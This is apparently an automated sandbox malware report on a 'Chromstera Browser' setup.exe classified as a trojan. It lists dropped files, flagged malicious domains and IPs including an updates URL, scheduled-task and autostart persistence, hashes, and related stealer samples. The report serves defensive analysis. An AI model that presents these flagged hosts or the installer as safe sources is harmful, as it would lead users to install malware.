                      setup.exe | 100% | Avira | TR/Redcap.gylsb
                      Source | Detection | Scanner | Label | Link
                      C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dll | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dll | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\tempFiles.dll | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\viewer.exe | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3193.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3230.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3250.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3290.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI32CF.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI32EF.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI331F.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3340.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3360.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI34E7.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3517.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3566.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI35A6.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI35E5.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\shi3105.tmp | 0% | ReversingLabs
                      C:\Users\user\AppData\Local\Temp\shiC6A3.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSI11D0.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSI4739.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSIC933.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSIC9EF.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSICA7D.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSICAEB.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSICB79.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSICBB9.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSICC66.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSID04F.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSID11C.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSIEC26.tmp | 0% | ReversingLabs
                      C:\Windows\Installer\MSIFB77.tmp | 0% | ReversingLabs
                      No Antivirus matches
                      No Antivirus matches

Source | Detection | Scanner | Label | Link
https://contoso.com/License | 0% | URL Reputation | safe |
https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe |
https://g.live.com/odclientsettings/Prod.C: | 0% | URL Reputation | safe |
https://g.live.com/odclientsettings/ProdV2 | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://chrome.cloudflare-dns.com/dns-query | 0% | URL Reputation | safe |
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
chrome.cloudflare-dns.com | 162.159.61.3 | true | false | | unknown
chromsteraupdates.com | 104.21.8.139 | true | true | | unknown
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | unknown
secure.chromstera.com | 188.114.97.3 | true | false | | unknown
googlehosted.l.googleusercontent.com | 172.217.16.193 | true | false | | unknown
clients2.googleusercontent.com | unknown | unknown | false | | unknown
chromsterabrowser.com | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4&time=1730139128 | false | | unknown
https://chromsteraupdates.com/download/updates.txt | true | | unknown
https://chrome.cloudflare-dns.com/dns-query | false | URL Reputation: safe | unknown
https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx | false | | unknown

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          104.21.8.139
                                                                                                                                          chromsteraupdates.comUnited States
                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                          188.114.97.3
                                                                                                                                          secure.chromstera.comEuropean Union
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          239.255.255.250
                                                                                                                                          unknownReserved
                                                                                                                                          unknownunknownfalse
                                                                                                                                          IP
                                                                                                                                          192.168.2.4
                                                                                                                                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544057
Start date and time: 2024-10-28 19:10:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 57
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: setup.exe
Detection: MAL
Classification: mal81.troj.evad.winEXE@150/138@11/5
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 62.5%
HCA Information: Failed
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 172.217.18.110, 142.251.5.84, 142.250.186.163, 34.104.35.123, 184.28.90.27, 142.250.186.170, 216.58.206.74, 172.217.16.202, 142.250.74.202, 142.250.184.202, 142.250.186.42, 142.250.185.138, 172.217.18.10, 216.58.212.138, 142.250.185.106, 142.250.186.138, 142.250.181.234, 142.250.186.74, 142.250.184.234, 142.250.186.106, 142.250.185.74, 13.107.42.16, 142.250.181.238, 13.107.21.239, 204.79.197.239, 142.250.185.202, 142.250.185.234, 216.58.206.42, 142.250.185.170, 142.250.185.195, 142.250.115.94, 142.250.113.94
                                                                                                                                          • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, config.edge.skype.com, optimizationguide-pa.googleapis.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, www.googleapis.com, edge.microsoft.com, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, l-0007.config.skype.com, edgeassetservice.azureedg
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 5480 because it is empty
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7488 because it is empty
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7964 because it is empty
                                                                                                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: setup.exe
Time | Type | Description
14:11:21 | API Interceptor | 1x Sleep call for process: setup.exe modified
14:11:29 | API Interceptor | 27x Sleep call for process: powershell.exe modified
14:11:59 | API Interceptor | 2x Sleep call for process: svchost.exe modified
18:11:28 | Task Scheduler | Run new task: ChromsteraUpdater path: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe
18:12:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GoogleChromeAutoLaunch_8C5C9E0722B4F57DB7551229F5A1D285 "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
18:12:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GoogleChromeAutoLaunch_8C5C9E0722B4F57DB7551229F5A1D285 "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
18:12:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
18:12:57 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  chromsteraupdates.comSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  googlehosted.l.googleusercontent.comfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 172.217.18.1
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 142.250.185.129
                                                                                                                                                                  https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6
HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                  • 172.217.16.129
                                                                                                                                                                  W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 142.250.184.225
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 142.250.186.33
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 142.250.184.193
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 172.217.18.1
                                                                                                                                                                  http://mychronictravel.eu.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 216.58.206.33
                                                                                                                                                                  https://docs.google.com/drawings/d/1igp9x84Q_2r8qSa1YDSk9dpVvjHGWjRjQMSbSGGfj2M/preview?pli=1VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXis
f43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1BvGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 142.250.181.225
                                                                                                                                                                  https://docs.google.com/drawings/d/1gvM7ysnJ7zDcSUShXnPoiA6pG4cjDDn9uHRbivsGidA/preview?pli=1jjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8
EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZsGet hashmaliciousMamba2FABrowse
                                                                                                                                                                  • 142.250.185.129
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                  http://bigfoot99.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 4.245.163.56
                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0edekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  V9fubyadY6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  (No subject) (93).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  https://1drv.ms/o/c/dfbe417e0dc15e08/Esl_LBLy3yNEou5UFJ-QxnIBMGmncz8uv1GwgEHKevm1cw?e=C2cldFGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19KTvTgKJSyw.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  RFQ_List.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  CQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 104.21.8.139
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dll | Setup.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dll | Setup.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dll | Typora#U5b89#U88c5#U52a9#U624b.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dll | Setup.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dll | Setup.exe | malicious | Unknown
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):433801
                                                                                                                                                                            Entropy (8bit):6.622296181456385
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:M3MN9WmHcLz+pjqgAOSMmEfS2im5/VJuRLXDCXObptI/p5vD1U:pN9Wm8LOUMlfS2JIjXfGp5BU
                                                                                                                                                                            MD5:F627D13DF9AB451DE2AFB60FEC79C8B5
                                                                                                                                                                            SHA1:A171DC22DACC297898F010F411067F600CFAEAF8
                                                                                                                                                                            SHA-256:C352B938FE40262B2E66950CA70AD82DC41988A13B97599F01A8DB0AA5EFF6C0
                                                                                                                                                                            SHA-512:AA10A9F037AE9AF0C8310988880962E5EAC0B58D7451575475553B3D9AD8F1CBD85360509DB390BF0C8620637C2C0F87173D34F52BEC5377D39E2CC654495C5C
                                                                                                                                                                            Malicious:false
